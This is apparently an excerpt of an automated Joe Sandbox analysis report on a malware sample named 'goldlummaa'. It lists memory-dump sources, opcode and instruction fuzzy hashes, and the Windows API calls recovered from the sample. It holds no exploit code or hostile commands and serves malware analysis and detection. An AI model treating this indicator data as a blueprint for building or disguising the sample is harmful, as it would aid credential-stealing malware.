                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                  • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                                                                                  • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                  • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                  • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                                                                                  • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                  • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                  • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                  • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                  • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                  • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                  • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                  • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                  • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                  • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                  • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                  • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                  • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                  • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
                                                                                                                  • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                  • Opcode Fuzzy Hash: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
                                                                                                                  • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                  • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                  • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                  • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
                                                                                                                  • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                  • Opcode Fuzzy Hash: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
                                                                                                                  • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                  • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                  • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                  • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                  • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                  • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                  • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65CB7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C65CBF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65D48
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C65D73
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65DC8
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00C695DD,00C62442,?,00000000,?), ref: 00C6958F
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C648A5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C648B3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00C648C4
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00C67F40,00C65A6B,00C65180), ref: 00C67F57
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C67F65
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C67F7E
                                                                                                                  • SetLastError.KERNEL32(00000000,00C67F40,00C65A6B,00C65180), ref: 00C67FD0
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00C688F8
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00C68B71
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00C71B77,000000FF,?,00C66B21,?,?,00C66BBD,00000000), ref: 00C66A95
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C66AA7
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00C71B77,000000FF,?,00C66B21,?,?,00C66BBD,00000000), ref: 00C66AC9
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D5AA
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D673
                                                                                                                  • __freea.LIBCMT ref: 00C6D6DA
                                                                                                                    • Part of subcall function 00C6B3B5: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C63C34,?,?,00C62442,00001000,?,00C623AA), ref: 00C6B3E7
                                                                                                                  • __freea.LIBCMT ref: 00C6D6ED
                                                                                                                  • __freea.LIBCMT ref: 00C6D6FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1096550386-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3849164406-0
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C6470A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64729
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64757
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647B2
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748), ref: 00C6D20D
                                                                                                                  • GetLastError.KERNEL32(?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748,00000000,?,00C68E2C), ref: 00C6D217
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C6D23F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  APIs
                                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00C6DD0B
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C6DF5D
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C6DFA3
                                                                                                                  • GetLastError.KERNEL32 ref: 00C6E046
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BD8C
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BD93
                                                                                                                  • GetLastError.KERNEL32(00000000,00C6C0CE,?,?,00000000,?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BDCD
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BDD4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C6C9A5
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9DD
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 158306478-0
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E2D
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C61E3B
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E54
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E93
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
